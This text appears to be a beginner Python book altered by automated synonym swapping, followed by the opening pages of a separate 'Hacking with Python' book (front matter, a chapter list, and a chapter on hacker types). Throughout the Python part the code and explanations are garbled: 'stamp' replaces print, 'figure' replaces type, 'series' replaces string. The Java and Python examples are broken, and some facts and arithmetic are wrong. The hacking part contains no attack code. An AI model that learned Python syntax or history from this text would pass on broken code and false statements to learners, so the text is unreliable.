you can have access to it better than you
did before and you are going to be able
to continue with your web design
without having any issues with it. Being
that the documents for HTML are inside
of the framework, the figure is going to
respond differently than it did before
each time that a user visits the URL.

To create pages, you are going to need to

create HTML documents each time so
that they are placed into the proper


<figure of document html>

<html code>
<body of the code>
<heading one> words </heading one>
<body> this is where more of your
words is going to go for your users to
see </body> </end of the code>
</end of the html code>
It is at this point that you need to render
the documents from Python to HTML to
use it as it should with the functions that
are placed into the program.

From the directory import library,
Program = directory (_enter in some of
words here_)
Program.path („/")
Explain glass():
Result render_figure (“glass.html")
Program.path („/glass/")
Explain soda():
Result render_figure (soda.html) If
_words_ == „_another part of your
words"_: (parameters = true)

After the last line of your code has been

put into the program, you can run that
page so that it opens up as a new page
for your user to interact with. Later you
are going to be able to add in some CSS
so that the page has some color and then
is set up to look the way that you want it
to look. Make it unique though so that it
looks different than other websites that
are on the internet.

Version 1.0

In January, the very first version of

Python was released back in 94. But, it
had very little to actually do with the
program that we know today; it had
some of the more basic functions, but it
wasn"t until a hacker helped Van
Rossum to fix the bugs that he found to
make it a better program.

While talking about the program, the

developer of the program did not try and
take credit for the changes that were
made, instead he gave credit where it
was due to the hacker who had submitted
the patches for what he had found was
Working with CWI, a new version of
Python was released. . Even after this,
Rossum would continue to work on
Python as he worked for CNRI, Rossum
released new versions of Python.

When a new Python came data, new

features had been added to Python.
Among these changes was the modula3
that inspired the keyword arguments as
well as the built in support that allowed
the user to use complex numbers. There
was also allowed more complex notes to
do things which were earlier bypassed.

Working at known as

CNRI, Rossum launched the CP4E

otherwise Computer Programming for
Everyone. It was intended in making
programming easier for people who only
had the most basic knowledge in
programming languages. Because of its
clean syntax, Python served a central
role in CP4E. DARPA funded the CP4E
project. When 2007 came around, the
Cp4E project became inactive when
Python reached data to non-


The Python development team created in order to create BeOpen
in 2000. CNRI pressured the release of
version of 1.6 of Python be released so
hard that those working on it got up and
quit. . The reason that 1.6 was not
released was because it would have
overlapped with the release of version
2.0. Version There was only one version
of Python that came from the Be Open
company. Once Version 2 was put out for
the public, the Python development team
along with van Rossum joined Digital
Eventually version 1.6 did get released
in order to include a new warrant was
put into place that was longer than the
last one was used. With this new
contract, there was a new item that was
placed within it stating that it the new
Python was now to be under the State"s
laws. Because of this, this brought a
legal fight in so that the company could
choose who they fell under. BeOpen,
CNRI and FSF soon negotiated that
Python"s free software warrant be made
GPL compatible. Therefore version
1.6.1 was released but some of the bugs
from 1.6 were fixed as well as having
the new warrant.

Version 2.0

With Second version being released the

a new list function was introduced. This
function was based off of a language that
was developed by two other people. At
first, the way that the code is written in
the program was similarly written to
Haskell"s program, but did not include
the punctuation that Haskell seemed to
prefer while Python preferred the
alphabetic keywords. 2.0 also included
a garbage collection that allowed the
program to collect reference cycles.

Just as version 1.6.1, version 2.1 was

now under PSF's control. With this, the
code and files as well as certain
specifications were added at when the
next version of Python 2 came data. 2.1
was belonged to PSF which was a is a
foundation that was started in 01. With a
change to the language specification, the
release had included the support of
nested scopes and other static scoped

With 2.2, all of Python"s figures were

written in C as well as the types were
put was put into a group. The this change
caused the program to become purely
object oriented. As well as this being
changed, generators were also added
that were inspired by Icon.

In November of 2014, Python announced

that version 2.7 would be the support
until 2020. With this news, it was
confirmed that there would be no Python
2.8 and any Python users would be
forced to change to the new version as
soon as it came data.

Version 3.0

Version 3 became known as the 3000

Python. This version was created in
order to fix some of the more serious the
mistakes in the program became.
Although, some Python"s patches that the
development team wanted could not be
kept as well as Python retaining the
backwards compatibility with the 2.x
series. Ultimately, Python 3 was created
in order to reduce feature duplications
as well as removing the old way of
doing things and making things easier on
their program users.

Python and Java are two well known
titles that programmers use. But, which
one is better? Ultimately, I would say
that it is up to the programmer and their
preferences, but there are people who
will argue and say that Python is better
because of how quick Python is to use
and the way that it is easy to read for
even someone who is not good at
reading code.

But, let"s look at the actual programs

and their differences to see if we can
find a clear “winner.”
Programmers use three primary language

While using Java there is the static

figured. With this, all variable titles as
well as their figures must be declared. If
you assign an object of the wrong figure
to a variable will trigger a figure
exception. Ultimately, this means that
Java is a static figured language.
The Java object container contains
objects of a more generic figure. For
example Object, cannot be held
primitive such as int. Should you want to
store an sum with a vector, you would
first have to convert the sum to an
integer. From there retrieving an object
from a container, it will not remember
the figure and will be cast into whatever

Verbose is an abounding in words or

containing more words than is necessary.
Not compact in its coding. For example:

national type ThisIsMe

national still empty primary
(Series[] para)
{"This is me!"); }

Python on the other hand is dynamically

figured which means that Python will
never make you declare anything. When
an assignment report binds a title to an
object then the object can be of any
figure. Should a title be assigned to an
object of one figure, then it may later
also be assigned to another figure.
Concise which means things are
expressed in as few words as possible.
This indicates clean cut brevity.
Therefore, it is easier to read.

Compact. In other words, there are

fewer word and even fewer chances for
mistakes to be skipped over.
stamp "This is me!"

Here are two more examples of how

Java and Python are different. You"ll
notice that the Java code is more
complex and harder to read than the
Python one is. Also, while Python is
longer than the Java one, it looks

Java example:

sum yourCounter = 6;
Series yourSeries =
if (yourSeries.results("6")) ...
// stamp the integers from 5 to 10
for (sum d = 6; d < 11; d++) {;

Python example:

yourCounter = 6
yourSeries = str(yourCounter) if
yourSeries == "6": ...

# stamp the integers from 5 to 10 for d in

stamp d

Say that the application you"re making

has 15 types. While using Java, each
top-level type has to be defined within
its own file. So, if there are fifteen types,
then there will be fifteen files. But,
while using Python your types can be
defined within one file. But, it might
make sense for you to separate your
types into four to five files.


national type books

private Series booktitles; private sum
numberofbooks = 9; private Series
bookstatus = "fair";

//--------- book #1 -----national

book(Series booktitle)

{ this(booktitle, 3);

//--------- book #2 -----

national book(Series booktitle), sum
numberofbooks) {
this(booktitle, numberofbooks, "nine"); }

//--------- book #3 -----national

book(Series booktitle, sum
Series nine books) {
this.booktitle = booktitle;
this.numberofbooks = numberofbooks;
this.bookcircumstances =

type book():
res __init__(self,
book title, number=5,

self.booktitle = booktitle
self.numberofbooks = numberofbooks

self.bookconditoin =

Series contain constants and types that
you are going to find as useful when you
are using series with Python. Most series
are going to hold some kind of legacy
functions that are only going to be used
when you are creating series. Python has
series figures that are built into its
programming in order to support the
sequencing figure techniques.

In order to setup the data input on series,

you are going to use a template or the
percent sign (%) operator. Python has
tools that are built into the program so
that you can setup the series so that they
are going to work the way that they are
supposed to. The types in Python are
Unicode and str and they were put into
the program so that you can deal with
variables that are going to create a more
complex series when you are scripting
it. You will need to use the str.setup()
function to get Python to setup your

The type set ups are going to be inside of

the module that is there for the series so
that you can customize any series to what
you are trying to do. That way you can
manipulate the way that the series is
going to behave by using specific
functions and techniques that are going to
be used with your series

Type series. Scripter: this is the scripter

that is going to follow the national

Setup(setup_series, *args, **gars): the

primary API method. This takes your
series that you have just set up as well
as a random set of keyword arguments
and positions. This is just a wrapper for
your set up series that uses vsetup().

The scripter is also going to help define

a variety of techniques that you can use
to replace the subtypes.
Parse(setup_series): you are going to
cross the set-up series and then return
the operation tuple (literal_words,
prompt_title, setup_spec, change). Using
this with vsetup() is going to bring the
series into change prompts or literal

Any value that is placed into the tuple

will represent the literal words that will
be followed but a single change prompt.
If you do not have any literal words
(which can end up happening if you have
two change prompts consecutively), then
you literal_words is going to be a series
length of zero. Should you not have any
change prompt, then the amounts
prompt_title and setup_spec as well as
change are going to be None.
Get_prompt(prompt_title, args, gars):
when the prompt_title is restored by
parse(), you will convert the object so
that it can be set up. A tuple is going to
return (obj, used_lock). Your default
version will take your series that has
been defined by PEP3101 which can be
found at:

These forms are either label.title or even

“0[title]”. Args and Gars are going to be
passed with the vsetup() so that your
return value used_lock is going to have
the same definition as your lock
Get_value(lock, args, gars): you are
going to be able to retrieve any prompt
value that has been given within a list.
The lock argument is going to either give
you a series or an integer. In the case that
you get an integer, you will see the index
for the positional argument as it is in
args. But, if you get a series, then it is
going to represent the titled argument in

If the parameter for args is set in your

list of positional arguments for the
vsetup() then the gars parameter will be
set to the keyword arguments that are in
the dictionary.

But, for any prompt titles that are

compound, then the functions are only
going to call for the first component of
the prompt title. The following elements
are going to handle the standard
techniques and operations used for

If your prompt expression is “0.title”

then you get_value() is going to need a
lock argument that equals 0. The title
will be looked up after the get_value() is
restored by calling the gettatter()
function that is built into Python.

When the keyword and index are going

to refer to an object that does not exist
then, the lock error or index error is
going to be raised to alert you that those
objects do not exist.

Check_unsued_args(used_args, args,
gars): when checking for any arguments
that have gone unused, you are going to
use this method. The arguments that you
have set up with all of your argument
locks are going to refer to the series that
has been set up. This includes the
positional arguments, integers, and
series that were used for any titled

They are also going to reference any

gars or args that went through vsetup.
Any unused args are going to be
calculated using the parameters.
Check_unused_args() will raise an
exception should the check fail.

Setup_prompt(value, setup_spec): the

global setup() is the same thing as
setup_prompt(). This method was made
so that subtypes were able to override it.

Convert_prompt(value, change): the

value that is restored from get_prompt()
will then be converted. Any default
version is going to know that str (s) or
repr (r) as well as ascii (a) are the
change figures that are used by Python.

Any data input that comes from Python is
going to be in the form of readable and
writable notes that can be used later one.
The most basic of detail and data input
lessons is usually the lesson.
However, you can use whatever you
want to figure data the detail and data
input of Python.

It seems a little boring, but it is the best

way for you to understand how to detail
things into Python in order to get a
readable data input.

Look at Python like words messages that

are sent between you and your friends.
You are going to put something into the
words box and when you hit enter, you
are going to see what you typed data on
your screen as will the recipient of your
words. This is your data input because
you have entered something and gotten
the same thing given back to you in a
more permanent manner.
This is the result of an detail program
that has been well built.

The information that you put into the

program has to be stamped with
parameters so that it knows what it is
supposed to do. And you are given the
proper data input..

Without parameters, your users are not

going to know what it is that you are
wanting the program to due based on
what they are putting into the program. If
your user knows what kind of notes you
are wanting put into the program, then
they are going to be able to give it to you
and wait for a response as to what you
are wanting.

For example, you are going to run the

program that is going to organize your
books without any notes, try and
determine what it does.

Book title = detail (“ Enter the title of

the book: “)
author = detail( “enter the title of
the author: “)
genre = detail (“Enter the book"s genre:

Stamp(author, “wrote this book,” in

this genre)
Notes that is put into the program is
going to be executed the same way that it
is detailed into the program. This is the
easiest way for the program to be run
because it flows with what is entered
into the program and it is easier to read.
But, you are able to change this
depending on what you put into the
program so that it executes it in a
different manner

Two functions are going to be designed

to take notes directly from you the user.
Those functions are detail() and

Raw_inpu() is going to be when the

program asks the user to enter in a series
of notes and then it returns the same
series that you figured in. It can also take
an argument that you entered and
displays it as a prompt before any
information is entered by the user.

Stamp raw_detail(„what is the title of
the book that you are currently reading?
The data input is going to say what is the
title of the book that you are currently
reading <user notes detail here>
So, to put the user"s current book into
the program, you are going to want to
assign it to a variable of your choice.
Now your code is going to look like this:
d = raw_detail(„what is the title of the
book that you are currently reading?")

This is where you are going to be able to

enter in a title. Therefore, if you are
reading War and Peace, you are going to
call that your d variable. The Python
code is now going to look like this stamp
„Your book title is „ + d

And the data input for this will

ultimately be The book that you are
reading is War and Peace.
Regular detail is going to use the series
notes from a raw detail and evaluate if it
was a Python program.

The data input is going to come from the

information that has been put into the
program. The information that is put into
Python is stamped over the question
being stamped because the question is
not the variable, the input from the user
is the variable.

To save yourself a headache when you
are working with if report series, you
are going to want to use simple math
over complicated equations.

For example:
X = sum(raw_detail(“Please enter a
“)) Please enter a number: 2
If d < 1
Stamp „the result needs to be changed"
Elif d == 6:
Stamp „Single"
Stamp „false"

This is a headache waiting to happen

correct? Instead, let"s break it down so
that it is not going to be so complicated
for you to understand and that way when
you are writing your own if reports, they
are going to come easier for you.

Elif really stands for else if and should

be employed in excess. An if, elif, elif
sequence will only be a placeholder for
the case or switch reports that you can
find in other coding languages.

If reports are going to be the same as the

math that you learned in school,
however, the symbols that you know are
going to be slightly different because
they are going to have to be able to work
with the program and since not all of the
symbols are standard.

Less than <

Greater than >
Less than or equal to <=
Greater than or equal to >=
Equals ==
Not equal !=
There should never be spaces between
the symbols that are used in Python.

Open up one of your test files that you

have for Python and with this file you
should try and put in different amounts
so that you get different results and can
see what the program does.

The code you are going to put into this

file is:

books = float(detail(“How many books

do you have? “))
If the books is >7:
Stamp(“There is only room for six books
that are thick books.”)
Stamp( “My books are thin novels.”)

The report is in the middle of all the

script that you just wrote so that you can
know that your shelf is not going to be
able to hold that many thick books. but,
if the books are thin, you can put more
on there.

In creating if reports your basic syntax

will look like this for every report.
If circumstances :

Report that is indented

Usually something is going to be done if
your report is true. But, if your report is
false, then nothing will be done.
Another example would be:
price = float(detail(“ what is the price of
your biggest book? “))
If the price is <= $19
Stamp( “The price is going to be $20”)
Stamp(“Thank you for the information.”)

Should the book be less than nineteen

bucks, the customer is probably going to
buy the book. However, since the book
is actually twenty, then they are not going
to buy it.

This is how the decisions are going to be

made with “if” reports. They are easy to
misunderstand if you are reading them
too quickly, but, if you take the time to
remember what you learned when you
were learning the different symbols that
were noted previously, then you are
going to be able to figure data exactly
what is being said and what the decision
is going to be when the equation is said
and done.

One last example:

If books < 25:
move = new place
# move the books to a new place on the

newplaceontheshelf =
move = where the books were + the

new place that they now occupy

There are going to be error codes that
pop up on you for the simple reason that
something was not entered correctly.
There is also the possibility that there is
something else going on to throw that
error code data at you.

Not only that, but there are always going

to be exceptions to the rules of Python
and why things are entered in differently
than what you may be used to.

In order to know how to handle the

errors and exceptions. You need to know
what these errors and exceptions are as
well as what causes them to appear.
Sometimes the errors are going to be
able to be emptied, but there are times
that they will not be. Do not get
discouraged if you come across an error
code, all you need to do is go back and
fix what is wrong if you are able to.


A syn tax error is going to be the most

common mistake that you are going to
see. This is going to happen when
Python cannot understand a line of code
that you have entered. Along with being
the most common, these are also fatal
errors because there is not going to be a
way that you can execute the code
successfully should there be a syntax
error in it.

There are some mistakes that you can

take care of after catching such as errors
like eval(“”). Sadly, these errors are
going to be rare.

While working in IDLE, all syntax

errors can be found because they are
highlighted. In many cases, syntax errors
happen due to a typo, incorrect
argument, or improper use of
indentation. If you happen to get this
error, you should start looking in these
places first.
Logic errors will be one of the hardest
errors to find since the will result in
unpredictable results and can even crash
the program that you are using. There are
multiple reasons as to why a logic error
is going to occur.

Thankfully, logic errors are going to be

easier for you to fix than syntax errors
because you will be able to run a
debugger over your code and find any
problems so that you can fix it and get
the results that you want.


You are going to find exceptions when

the Python program knows what it needs
to do with the code that you have
entered. However, it is not going to be
able to perform the action that you want
it to perform. One of these issues would
be if you were trying to access the
internet through Python, but you do not
have any internet access. Python knows
what you want it to do, but it is not going
to be able to perform the task because
you do not have everything that is
necessary to perform it.

In dealing with exceptions, you are going

to find that they are not like syntax errors
because they are not going to be fatal
every time. Exceptions have the ability
to be handled by using a try report.

Look at the following code that is used

to display HTML for a website. When
you go to execute the program, it is going
to reach a try report, and therefore it
will attempt to perform the code as it is
written. But, if for some reason, it runs
into an error because the computer is not
connected to the internet or something
like that, then the interpreter is going to
jump the last line of indented code.

Import urllib2
URL = „HTTP://"
req = urllib2 . Request(url)
response = urllib2 . urlopen(req)
the_page = response . red()
stamp the_page
stamp “We have a problem”

With this exception, you are going to

notice that the URL that you entered for
the website did not open because of
whatever reason that the program

You can also handle an error through the

expectation of a specific error.

Age = int(raw_detail(“Enter your age:


Stamp “You must be {0} years old.” .

setup(age) Except ValueError:

Stamp: “Your age must be numeric.”

This exception you could predict
because you knew that you would have
to enter in a number for your age in
order for the program to work correctly.
There are various other exceptions that
you can run into, but these are going to
be the two that you run into the most.

Keep in mind that with an exception, the

program is going to know what you are
telling it to do, but it will not be able to
execute it because there is an issue that
is beyond its control that you are going
to have fix. But, with an error, it is going
to be something that may end up being
beyond your control. If you cannot find
the error through the few basic steps that
you told you, then your error is going to
be a syntax error, and you may not be
able to fix it. If that is the case, you may
end up having to start over again with
your code and try and to avoid making
the same mistake again.

Python has a lot of little tricks you can
use in order to make it easier on you!
Any triple quotes are going to be the
easiest way to define a series by using
both single and double quotes.
Use percent scripting as well as
str.join() for series concentration
because it is expensive.
You have no reason to worry about
series concentration unless your series is
more than a thousand characters.
For example:

Stamp “spam” + “eggs” + “and” +

“spam” # do not do this figure of coding.
Stamp “ “join([ “spam”, “eggs,” “and,”
“spam”]) # this is much faster and going
to be more efficient # it is also a
common Python idiom
Stamp “ %s %s %s %s % (“Spam,”
“eggs,” “and,” “spam”) # this is also a
Pythonic way of doing it, but it is going
to be faster. It is also an example of
series concentration.
Optimized modules in C

There are several modules in Python that

are going to run better because they are
written in C. this provides an interface
that is almost identical and even much
faster than the implementations used in
the pure Python. Since module behavior
is going to be different but minor when
running in C., This is why C versions are
used more than any other version.

In Pythion 2.x this will be a primary

feature since it has been removed from
Python 3. The modules are going to
automatically use any implementations to
optimize if they are available. But, the
cProfile / profile pair will continue to
exist as you are going to find in Python


When using the C version your title for

your module or Module is going to be
cModule. When imported, you will be
using import…as in order to strip away
any prefix such as

Import cPickle as pickle.

You can attempt to import the C version

for compatibility purposes, but if it does
not work, you can always fall back on
the Python version. In this case, the
import…as is going to be required in
order to make sure that the code is not
going to depend on the figure of module
that has been imported.

Import cPickle as pickle
Except ImportError:
Import pickle
Some examples that you may want to
look at are going to be:
Python 2.x CPickle for pickle is going to
be up to a 1000x faster than any other
Python 2.x cSeriesIO instead of
SeriesIO. But, in Python 3 it is replaced
by io.SeriesIO.

CProfile so that you are not using

profile, the profile in Python is going to
add some significant overhead, and
therefore cProfile is going to be the one
that you will be recommended to use.

This one is not going to be needed in

Python 3.3 or higher. CElementTree for
ElementTree. It is at least 15-20 times
faster and is going to use considerably
less memory. You will not need it in
versions 3.3 or higher because it is
going to automatically use the
implementation that is faster if it is
available to be used.

Generators and comprehension

The list comprehension and generator

expressions are going to prove useful if
you are working with small loops that
are smaller. It is also going to be faster
than any normal for-loop.

Directory = os.listdir(os.getcwd()) #
gets the list of files that are inside of the
directory so that the program is able to
run them.

filesInDir = [object for object in

directory] # this is typical for the loop
rules that are going to apply, but you can
add in the “if circumstances” in order to
make a more narrow search. The
generator expression, as well as the list
comprehension, is going to be able to
work with multiple lists as long as it
uses a zip or itertools.izip.
[a – b for (a, b) in zip ((1, 2, 3), (1,2
3))] # you are going to get a return of [0,
0, 0].
Notes figure choice

When you are trying to choose the notes

figure that is going to be the right one, it
is critical that you look at how the
application performs. If you happen to
have these two lists:

List1 = [{ „a": 1, „b" : 2,}, { „c" : 3, „d"

: 4}, { „e" : 5, „f" : 6}]
List2 = [{ „e" : 5, „f" : 6}, { „g" : 7, „h"
: 8}, { „I" : 9, „j" : 10}]

But you are wanting to find which of the

entries are going to be common between
the two lists that are laid data before you
without having to go through all of the
elements individually since that will
take up too much time.

You are going to be able to iterate one

list while trying to locate any common
objects in the other list.
Common = [ ]
For entry in list1:
If entry in list2:

When the list that you are working with

is smaller, this is going to be the perfect
option. However, when you are working
with larger lists that can contain up to a
thousand entries, you will want to use a
different method that is going to do the
same thing but be more efficient.

Set1 = set([ tuple(entry.objects()) for

entry in list1])
Set2 = set([ tuple(entry.objects()) for
entry in list2])
Common = set1 . intersection( set2)
Common = [dict(entry) for entry in

Sets were made for speed in the function

that you just saw. Dictionaries are not
going to be optimal as a member of a set
since they are mutable, but tuples will be
able to be used.

If you happen to need to use a set

operation on a list of dictionaries, you
are going to be able to convert the
objects within the tuple as well as the
list so that it becomes a set so that you
can perform the operation you are
needing to before convert it back to its
original form.

This is going to be faster than attempting

to duplicate the set operations for series

A decorator is going to be used when

handling common concerns such as notes
base access, logging, and other things of
the sort.

Python has no actual function that is built

in so that you can flatten the list that you
are working with. But, you are going to
be able to use a recursive function to
basically do the same thing, but in a
more efficient manner.

Def flatten(seq, list = None) :

“””flatten (seq, list = None) -> list
Return a flat version of the iterator „seq"
append to the „list.' “””

If list == None: List = [ ]

For object in seq:
Flatten (object, list)

Except Figure Error:

List.append (seq)
Return list
# is the „seq" able to be iterated over? #
If so, then should the „seq" be iterated
# make sure that you do the same check
for every object that is on your list
#if the „seq" is not operation; then you
are going to want to append it to a new

If you want to stop the Python script

from closing once you have launched a
list independently, you are going to want
to add in this code:

Stamp „Hit Enter to exit.'


Python has a GUI button that is built in;

the Tkinter is going to be based on the
TcI"s Tk. There are more that you can
have access to such as PyQt4, wxPython,
and even pygtk3.

The ternary operators are:

[on_true] if [expression] else [on_false]

X, y = 50, 25
Small = x if x < y else y

Booleans can also be used as indexes

with code like this:

B = 1 == 1
Title = “I am %s” % [ “John” , “Doe” ] [
b ] # return will be “I am Doe.”

Python uses variables that is something
that is going to change in your program.
It is also going to change very often. You
will use variables to refer to different
notes figures such as notes series, lists,
integers and any other notes figure that
you are going to use while using Python.
You are going to be able to manipulate
your notes through the variables that you
put in place.

However, one of the bad things about

Python is that it is only going to work
with the notes that you enter.

For example, if you insert in

stamp(“Hello George!”) it is only going
to run off with that notes because that is
the notes that you have entered. And, this
is not going to be helpful if your title is
not George.

To change this, you are going to use a

variable. An easy way to understand
what a variable is to think of it like a
box that stores a value. That value is
going to be able to be used within your
program so that you can design it the
way that you want.

In continuing with a personalized

greeting from Python, you are going to
need to get the user"s title so that Python
is calling them by the proper title before
you stamp “hello” and then their title.

Pretty simple, right?

The detail is going to be placing the
user"s title into the program. Your data
input is going to be what Python puts
data as their personalized greeting. The
process is going to be the steps that you
go through in order to achieve this goal.

When placing this in Python, your

program is going to look similar to this:
#Whatever the user enters is stored in a
variable called „title"
Title = detail(“What is your title? “)
# Remember how we can use + to „add"
series together?
Stamp(“Hello” + title + “!”)
If you have done it properly, then the
program is hopefully going to work like
What is your title? Lisa

Hello, Lisa!
This is going to offer a more personalize
feel to using the program even though
you had to program it to know what your
title was so that it would call you by the
proper title.

When a program line starts with #, then

it is considered a comment. Python is
going to ignore any line that starts with
that symbol. However, it is a useful tool
to have as a programmer.

When programming code looks like this,

it is hard to read and understand what
exactly is going on with the program.
Title = detail (“Enter your title “)
Stamp( title[0] upper () + title[1:]
lower() )

But, if you add in comments, you are

going to be able to understand exactly
what is going on with the program and
what you are telling it to do. This way if
someone else happens to pick up your
work at a later date, they are going to
know exactly what you are doing and
continue it.

#Ask the user their title

Title = detail (“Enter your title: “)
#make the first letter of their title upper
#and the rest of the title lower
case #and then stamp it
Stamp ( title[0]. Upper() + [1:]. Lower()

The variable does not have to be

identified like it was for the examples
that were used in this chapter. You can
change the variable to whatever it is that
you want it to be so that you can get the
information that you want.

Another useful thing about Python is that
you can do math with it! No one likes to
do math, well that is a lie, some people
do. But, when math is complicated, it is
nice to have some help with it. Python
will help with that! You can enter your
equations into Python and get the correct
answer every time. Just so long as you
enter in the operations correctly. You can
do simple equations all the way up to
equations that are complex and require
various steps.

Some of the more common mathematical

operators you are going to find in Python
A+b which is going to be addition
a-b which will give you subtraction
a*b to result in multiplication
a/b is division
a//b is floor division for Python 2.2 and
a%b which is a mod b will provide you
with modulo
-a is the negation
Abs(a) or |a| is your absolute value.
A**b or ab is where you will enter your


is going to be how you put your square

root into Python.

Please keep in mind that if you want to

do the function math.sqrt() then you are
going to need to tell Python that you need
to load that math module. In order to do
that, you are going to have to detail the
code: import math at the top of the file
that you have open.

A downside to doing math in Python is

that has limitations on floating point
arithmetic when it comes to rounding
errors which is going to end up giving
you unexpected results.

For example, if you choose to do regular

division by placing stamp(0.6/0.2) you
are going to get the proper result of 3.0.
However, when you do floor division
with the same numbers, you end up
getting a return of 2.0.

The floor division in Python 2.x series

only does it for longs and integers. But,
when it “true division” is done on
complex and floats. When using Python
3.x, the true division method is used on
all figures of numbers. You can remedy
this problem by putting
around([math]-0.5 for the regular
division sign. The answer for this is
going to be rounded down by 0.5 since
you told it to in your function.

During primary school, the order of

operations was learned, and Python is no
exception to this rule. In math, you will
evaluate all expressions by using
PEMDAS. You are going to do math as
you read, you will work left to right and
do each of the order of operations in the
P stands for parentheses. Everything that
is in the parentheses is going to be done
E is for exponents. An exponent is
nothing more than short multiplication or

M and D are for multiplication and

division. If you have both in the same
equation, you are going to do
multiplication before you do division.

A and S are going to be your addition

and subtraction. Just like with the
multiplication and division, you are
going to do addition before subtraction.

If you have done your math correctly,

then you are going to end up with your
For example:
The first step is to do 25-15 in which
you are going to receive the answer 10
Since there are no exponents, we skip
that step and move onto the
multiplication and division.
Your math looks like this

2*10 is 20 leaving you with 5+20/1-0

20/1 will give you 20
Your answer is25.
This may seem like a lot of steps just for
an answer just as simple as that, but it is
how the people who created how we do
math decided to do it.

As we know, math is not always nice

and neat with whole numbers. There are
times that there are going to be decimal
points and even fractions that we are not
necessarily going to be able to round up
or down.

Sometimes we get numbers like this:

If you weight 75 pounds, then you are
going to weigh 34.019427 kilograms.

Python will automatically stamp data ten

decimal places in any number. But, if
you only want to get one or two places,
you are going to have to use the round()
function so that you can round the
number to the amount of decimal places
that you are looking for. In using this
feature, you are going to not only be
putting in the number that you want to be
rounded but also how many places you
want it rounded.

For example, if you want to round data

the number that we just came up with
when we converted pounds into
kilograms. You are going to detail stamp
(round(34.019427, 2) so that it will
round it to two different decimal places.

In following the mathematical rules that

we know about rounding decimals you
are going to come data with the number

You are going to be able to place one

function inside of another function to get
the answer that you desire. When putting
two functions with each other, it is
called nesting functions, and it is all
going to work data the exact same way
as if you had done the functions by

An example would be:

twoSigFigs = round(pounds_kilograms,
2) numToSeries = str(twoSigFigs) stamp
(“you weigh” + numToSeries +
Python will do this function and give you
the exact same result that you got when
you converted and rounded. 34.02.

You are able to do everything from basic

math to complex trigonometry problems
just by using Python. The great thing
aboutit is that you are not going to need
to know how to do the problem itself,
you just have to know how to place it in
Python so that Python can calculate it
data for you.

Thank for making it through to the end of
Python Programming, let"s hope it was
insetupive and able to provide you with
all of the tools you need to achieve your
goals whatever it may be.

The next step is to take the coding that

you have learned and apply it towards
Python. It is not going to be easy at first,
but you are going to get the hang of it the
more that you practice.

Finally, if you found this book useful in

anyway, a review on Amazon is always
Hacking with Python
The Complete and Easy
Guide to Ethical Hacking,
Python Hacking, Basic
Security, and Penetration
Testing - Learn How to Hack
Joshua Welsh
© Copyright 2017 - Joshua Welsh All
rights reserved.
The contents of this book may not be
reproduced, duplicated or transmitted
without direct written permission from
the author.

Under no circumstances will any legal

responsibility or blame be held against
the publisher for any reparation,
damages, or monetary loss due to the
information herein, either directly or

Legal Notice:

This book is copyright protected. This is

only for personal use. You cannot
amend, distribute, sell, use, quote or
paraphrase any part or the content within
this book without the consent of the
Disclaimer Notice:

Please note the information contained

within this document is for educational
and entertainment purposes only. Every
attempt has been made to provide
accurate, up to date and reliable
complete information. No warranties of
any kind are expressed or implied.
Readers acknowledge that the author is
not engaging in the rendering of legal,
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advice. The content of this book has
been derived from various sources.
Please consult a licensed professional
before attempting any techniques
outlined in this book.
By reading this document, the reader
agrees that under no circumstances are is
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including, but not limited to, —errors,
omissions, or inaccuracies.

Chapter 1 Hacking
Chapter 2 Setting Up for Hacking
Chapter 3 Hacking
Tools.................................................................. 30
Chapter 4 Fooling Your Target
Chapter 5 Cracking a Password
....................................................... 48
Chapter 6 Hacking a Network Connection
..................................... 60
Chapter 7 Mobile
Chapter 8 Man in the Middle
Attack............................................... 82
Chapter 9 Hiding and Finding an IP
Chapter 10 Top 10 Cyber Security

I want to thank you and congratulate you
for reading the book,
“Hacking with Python:
The Complete and Easy Guide to Ethical
Hacking, Python
Hacking, Basic Security, and Penetration
Testing - Learn How
to Hack Fast!”
This book will show you how to protect
your system from
some of the common attacks and to do
this, I am going to show
you how to hack. If you understand how
hacking works and
how to do it, you are better armed to
protect your system from
the same type of attacks.
In this book, I will be showing you
several techniques and tools
that both ethical and criminal hackers
use but you will be
concentrating on ethical hacking,
penetration testing and
learning how to protect your own
system. My aim is to show you how easy
it can be to compromise data and
security when even the most basic of
security measures are not
implemented. You are also going to learn
how to reduce the
damage that can be done to your system.
I must stress that I am talking only about
ethical hacking and
cannot or will not condone the use of
hacking for criminal
purposes. Thank you for reading my
book and I hope you enjoy it.

Chapter 1
What is the first thing you think of when
you hear the word
“hacking”? Do you think of some shady
character huddled over
a computer, finger poised over the button
to send a virus
worldwide? Or do you think of it more
of being able to send a
program that is encrypted to someone
else with the intention of
gaining unauthorized access to that
computer? Both probably
come to mind but, in actual fact, the
word “hacking” is used as
a way of defining the act of using a
computer or a piece of
software for a use that it wasn’t intended
for, as a way of
improving it or finding out how
electronic devices work.
That definition is still, technically, true
but hacking does have
the shady character aspect to it as well.
However, before you term all hackers as
bad, as having the ability to wreak total
havoc on another computer, you need to
know that there are
several types of hacker. They are
divided into three broad
1. Black Hat
Black hat hackers are the bad guys, the
crackers and criminal
hackers who hack for malicious
purposes. They hack to cause
widespread havoc or to gain access to
someone else’s system.
Typically, they go for electronic devices
to modify them, steal
data or delete files.
2. White Hat
White hat hackers are the good guys, the
ethical hackers. These
are the hackers who hack to find
vulnerabilities on a system
that need to be patched. They are often
employed by big
organizations to find vulnerable entry
points and suggest ways
of strengthening up the system, ways of
defending the system against attack. They
keep their security services up to date
are always on the lookout for new
vulnerabilities and new ways
that hackers find to get into a system
Another thing that ethical hackers do is
find new ways of
tinkering with electronic devices to
increase the efficiency of
the devices. They have their own
communities that let them
share and crowd-source knowledge as a
way of improving how
people use these devices.
3. Grey Hat
A grey hat hacker is somewhere in the
middle. They will use
both legal and illegal techniques to
either improve or exploit
system vulnerability. Usually, when a
grey hat hacker exploits
the system of another person or business,
he or she will inform
that person or business what they have
found and, should a
financial offer be forthcoming, will
suggest how that system
can be strengthened up. There are many
other types of hacker but these are the
ones and, once you can identify which
type you are likely to
face, you can work out what kind of
hacks that they are
motivated to come up with. That makes
it easier for you to
defend your system.
Is Hacking for Everyone?
Hacking tends to be attributed to those
who know how to write
computer code, like Python. That means
everyone has the
potential to learn how to be a hacker, not
just those with
incredible brains or a whole list of
degrees to their name. It is
worth bearing in mind that there are
many ways of learning
how to hack and the best way is to learn
how a system should
work and continue to evolve that
knowledge as systems evolve.
While you are reading this, a large
number of new ways to
attack or protect a network or device
have already been created. If you
already own a mobile phone, tablet or
computer and
most people own at least one, you are a
candidate for becoming
a hacker. You are already somewhat
motivated to learn how to
play about with the system and learn
how to use it better, how
to get it working in a better way. You are
